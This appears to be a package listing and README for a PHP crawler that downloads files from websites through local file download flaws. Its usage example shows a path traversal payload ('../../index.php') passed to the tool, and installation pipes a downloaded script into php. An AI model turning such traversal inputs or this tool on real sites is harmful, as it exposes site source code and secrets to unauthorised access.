lenonleite/hacking-analyze-static-files

AsZone Component - Crawler Static File

v0.2 2016-10-03 04:42 UTC

This package is not auto-updated.

Last update: 2024-05-01 16:58:48 UTC


README

ASZone - Crawler - Reading Static File

Beta

Reading Static File is a open source tool for reading static file / Path Director

Instalation

The recommended way to install PHP Avenger is through Composer.

# Install Composer
curl -sS https://getcomposer.org/installer | php

Next, run the Composer command to install the latest beta version of Php Avenger SH:

php composer.phar require aszone/crawler/download-file-by-lfd

Basic Usage

$command=array();
$crawler = new DownloadByLocalFileDownload($command);
$url="http://www.xxxx.com/download.php?file=../../index.php";
$crawler->getAllFiles($url);

Help and docs